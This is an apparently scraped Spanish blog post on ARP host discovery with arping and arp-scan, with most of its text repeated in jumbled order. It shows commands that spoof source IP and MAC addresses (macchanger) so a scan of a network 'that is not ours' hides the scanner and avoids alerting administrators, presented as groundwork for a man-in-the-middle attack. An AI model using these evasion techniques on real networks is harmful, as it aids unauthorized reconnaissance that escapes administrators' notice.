Buscando un poco mas encontré a don "arp-scan", el nombre es bastante explícito xD. Es bastante mas flexible que arping y nos permite realizar consultas a un rango de direcciones, una única dirección, o toda la red. El man de arp-scan es un poco rebuscado, pero se deja leer :D.
Probando arp-scan:
Ahora si!, escaneamos un rango de direcciones de la red, desde 192.168.0.1 a 192.168.0.48 y nos encontramos con 4 hosts activos!
root@moon:/home/juan# arp-scan -I eth0 -q -r 1 192.168.0.1-192.168.0.48
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 48 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.0.1 00:08:54:29:06:__
192.168.0.10 00:27:19:dc:d7:__
192.168.0.20 00:e0:4c:a8:89:__
192.168.0.26 00:19:66:38:0a:__
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.6: 48 hosts scanned in 0.539 seconds (89.05 hosts/sec). 4 responded
Logré lo que pretendía, pero claramente se enviaron 48 ARP-Request con mi dirección IP como origen de la consulta. Que a dónde voy?, simple, si se trata de nuestra red no hay problema, nadie va a quejarse al ver tanto interés por parte de una dirección por conocer a todos los hosts activos, pero si no se trata de nuestra red? en el último caso sería muy interesante poder evitar que nuestra dirección de red y nuestra MAC se incluyeran en las consultas :D. Claro que si!!!, arp-scan nos permite alterar los campos del paquete ARP para lograr esto :D.
Arp-scan e IP spoof:
Acá va el primer intento por anonimizar (existe?) las consultas. "-s 192.168.0.45" es la dirección que figurará como origen en la consulta, ahora ya no ponemos en juego nuestra dirección IP real! pero claro xD, aún enviamos nuestra dirección MAC original, es decir que aún somos un blanco fácil...
root@moon:/home/juan# arp-scan -I eth0 -r 1 -q -s 192.168.0.45 192.168.0.1-192.168.0.48
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 48 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.0.1 00:08:54:29:06:_
192.168.0.10 00:27:19:dc:d7:_
192.168.0.20 00:e0:4c:a8:89:_
192.168.0.26 00:19:66:38:0a:_
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.6: 48 hosts scanned in 0.465 seconds (103.23 hosts/sec). 4 responded
root@moon:/home/juan#
Arp-scan e IP spoof + MAC spoof V1:
El primer intento fue ir directamente a lo fácil y alterar todos los campos utilizando arp-scan, pero mi sorpresa fue estaa... Al cambiar tanto la dirección mac (de la consulta, como la que va dentro del paquete) como la dirección IP de origen, las respuestas no son capturadas correctamente por arp-scan (puede verificarse con wireshark (por ejemplo) que las consultas y respuestas se completan perfectamente) y podríamos creer que el host no está activo (192.168.0.1 está activo, aunque no lo parezca). Si bien es totalmente factible corroborar los hosts activos viendo las respuestas desde wireshark, estaríamos complicando mas el panorama, y esa jamás fue la idea :D.
root@moon:/home/juan# arp-scan -I eth0 -r 1 -q -S 00:11:22:33:44:55 -u 00:11:22:33:44:55 -s 192.168.0.45 192.168.0.1
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 1 hosts (http://www.nta-monitor.com/tools/arp-scan/)
0 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.6: 1 hosts scanned in 0.347 seconds (2.88 hosts/sec). 0 responded
root@moon:/home/juan#
Arp-scan e IP spoof + MAC spoof V2:
En esta versión primero cambiamos la dirección MAC de nuestro adaptador de red, utilizando macchanger (a decir verdad no es necesario utilizarlo, puede hacerse tranquilamente con ifconfig) y luego lanzamos nuestro querido arp-scan, para encontrarnos finalmente con los hosts activos, pero esta vez ocultando completamente nuestra identidad dentro de la red.
root@moon:/home/juan# macchanger -m 00:11:22:33:44:55 eth0
Current MAC: 00:24:21:6d:00:36 (unknown)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
root@moon:/home/juan# arp-scan -I eth0 -r 1 -q -S 00:11:22:33:44:55 -u 00:11:22:33:44:55 -s 192.168.0.45 192.168.0.1-192.168.0.48
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 48 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.0.1 00:08:54:29:06:__
192.168.0.10 00:27:19:dc:d7:__
192.168.0.20 00:e0:4c:a8:89:__
192.168.0.26 00:19:66:38:0a:__
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.6: 48 hosts scanned in 0.476 seconds (100.84 hosts/sec). 4 responded
root@moon:/home/juan#
Algunas consideraciones:
-"Arp-scan e IP spoof" aunque parezca que fuimos cuidadosos no lo fuimos, wireshark detectó que una dirección MAC estaba asociada a dos direcciones de red, la dirección actual y la dirección falsa, esto podría haber disparado alarmas en alguno de los hosts y haber alertado al administrador.
-Podría darse el caso donde la IP que elijamos para ocultarnos ya esté asignada en la red, seria interesante elegir una dirección que difícilmente esté en uso, para evitar conflictos de direcciones que puedan alarmar a los usuarios de los hosts o el administrador mismo.
-Si si, esto es la previa para un ataque MITM (hombre en el medio), posiblemente en la próxima entrada :D.
-arping no me permitió utilizar una dirección que no fuese la que tiene asignada la interface eth0, un poco de mal gusto xD.
-Había pensado en una mas, pero se me acaba de olvidar :D.
Ahora si que me bajó el sueño!
Lo primero que me vino a la mente fue hacer un ping a cada host de la red, pero cabe la posibilidad de que los hosts no respondan las ECHO-Request ICMP, entonces me estaría perdiendo alguno que otro. Entonces lo mas recomendable me pareció ser utilizar ARP (Address Resolution Protocol), protocolo esencial en las redes LAN para traducir las direcciones de red (IP en este caso) a direcciones de capa de enlace (Ethernet MAC address en este caso).
Cabe aclarar que las comunicaciones entre hosts que pertenecen a un mismo segmento LAN se realiza mediante direcciones MAC, las direcciones IP realmente se utilizan cuando los hosts se encuentran en diferentes redes.
Volviendo al tema... buscando alguna aplicación que sea útil para esta tarea me encontré inicialmente con "arping" (parte del paquete iputils), que justamente nos permite crear paquetes ARP.
Primero aproximación con arping:
Podemos ver que el host 192.168.0.1 está activo y respondió a la primer consulta, entonces no fue necesario enviar mas. "-f deja de enviar ni bien recibe una respuesta" "-c 2 máximo de consultas".
root@moon:/home/juan# arping -f -c 2 -I eth0 192.168.0.1
ARPING 192.168.0.1 from 192.168.0.36 eth0
Unicast reply from 192.168.0.1 [00:08:54:29:06:__] 0.876ms
Sent 1 probes (1 broadcast(s))
Received 1 response(s)
Definitivamente esto no es lo que queria, tener que repetir el comando mas de 200 veces para recorrer todo la red C no está en mis planes, si bien podría hacerse con un script, no me interesa.
Buscando un poco mas encontré a don "arp-scan", el nombre es bastante explícito xD. Es bastante mas flexible que arping y nos permite realizar consultas a un rango de direcciones, una única dirección, o toda la red. El man de arp-scan es un poco rebuscado, pero se deja leer :D.
Probando arp-scan:
Ahora si!, escaneamos un rango de direcciones de la red, desde 192.168.0.1 a 192.168.0.48 y nos encontramos con 4 hosts activos!
root@moon:/home/juan# arp-scan -I eth0 -q -r 1 192.168.0.1-192.168.0.48
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 48 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.0.1 00:08:54:29:06:__
192.168.0.10 00:27:19:dc:d7:__
192.168.0.20 00:e0:4c:a8:89:__
192.168.0.26 00:19:66:38:0a:__
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.6: 48 hosts scanned in 0.539 seconds (89.05 hosts/sec). 4 responded
Logré lo que pretendía, pero claramente se enviaron 48 ARP-Request con mi dirección IP como origen de la consulta. Que a dónde voy?, simple, si se trata de nuestra red no hay problema, nadie va a quejarse al ver tanto interés por parte de una dirección por conocer a todos los hosts activos, pero si no se trata de nuestra red? en el último caso sería muy interesante poder evitar que nuestra dirección de red y nuestra MAC se incluyeran en las consultas :D. Claro que si!!!, arp-scan nos permite alterar los campos del paquete ARP para lograr esto :D.
Arp-scan e IP spoof:
Acá va el primer intento por anonimizar (existe?) las consultas. "-s 192.168.0.45" es la dirección que figurará como origen en la consulta, ahora ya no ponemos en juego nuestra dirección IP real! pero claro xD, aún enviamos nuestra dirección MAC original, es decir que aún somos un blanco fácil...
root@moon:/home/juan# arp-scan -I eth0 -r 1 -q -s 192.168.0.45 192.168.0.1-192.168.0.48
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 48 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.0.1 00:08:54:29:06:_
192.168.0.10 00:27:19:dc:d7:_
192.168.0.20 00:e0:4c:a8:89:_
192.168.0.26 00:19:66:38:0a:_
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.6: 48 hosts scanned in 0.465 seconds (103.23 hosts/sec). 4 responded
root@moon:/home/juan#
Arp-scan e IP spoof + MAC spoof V1:
El primer intento fue ir directamente a lo fácil y alterar todos los campos utilizando arp-scan, pero mi sorpresa fue estaa... Al cambiar tanto la dirección mac (de la consulta, como la que va dentro del paquete) como la dirección IP de origen, las respuestas no son capturadas correctamente por arp-scan (puede verificarse con wireshark (por ejemplo) que las consultas y respuestas se completan perfectamente) y podríamos creer que el host no está activo (192.168.0.1 está activo, aunque no lo parezca). Si bien es totalmente factible corroborar los hosts activos viendo las respuestas desde wireshark, estaríamos complicando mas el panorama, y esa jamás fue la idea :D.
root@moon:/home/juan# arp-scan -I eth0 -r 1 -q -S 00:11:22:33:44:55 -u 00:11:22:33:44:55 -s 192.168.0.45 192.168.0.1
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 1 hosts (http://www.nta-monitor.com/tools/arp-scan/)
0 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.6: 1 hosts scanned in 0.347 seconds (2.88 hosts/sec). 0 responded
root@moon:/home/juan#
Arp-scan e IP spoof + MAC spoof V2:
En esta versión primero cambiamos la dirección MAC de nuestro adaptador de red, utilizando macchanger (a decir verdad no es necesario utilizarlo, puede hacerse tranquilamente con ifconfig) y luego lanzamos nuestro querido arp-scan, para encontrarnos finalmente con los hosts activos, pero esta vez ocultando completamente nuestra identidad dentro de la red.
root@moon:/home/juan# macchanger -m 00:11:22:33:44:55 eth0
Current MAC: 00:24:21:6d:00:36 (unknown)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
root@moon:/home/juan# arp-scan -I eth0 -r 1 -q -S 00:11:22:33:44:55 -u 00:11:22:33:44:55 -s 192.168.0.45 192.168.0.1-192.168.0.48
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 48 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.0.1 00:08:54:29:06:__
192.168.0.10 00:27:19:dc:d7:__
192.168.0.20 00:e0:4c:a8:89:__
192.168.0.26 00:19:66:38:0a:__
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.6: 48 hosts scanned in 0.476 seconds (100.84 hosts/sec). 4 responded
root@moon:/home/juan#
Algunas consideraciones:
-"Arp-scan e IP spoof" aunque parezca que fuimos cuidadosos no lo fuimos, wireshark detectó que una dirección MAC estaba asociada a dos direcciones de red, la dirección actual y la dirección falsa, esto podría haber disparado alarmas en alguno de los hosts y haber alertado al administrador.
-Podría darse el caso donde la IP que elijamos para ocultarnos ya esté asignada en la red, seria interesante elegir una dirección que difícilmente esté en uso, para evitar conflictos de direcciones que puedan alarmar a los usuarios de los hosts o el administrador mismo.
-Si si, esto es la previa para un ataque MITM (hombre en el medio), posiblemente en la próxima entrada :D.
-arping no me permitió utilizar una dirección que no fuese la que tiene asignada la interface eth0, un poco de mal gusto xD.
-Había pensado en una mas, pero se me acaba de olvidar :D.
Ahora si que me bajó el sueño!
Suscribirse a:
Entradas (Atom)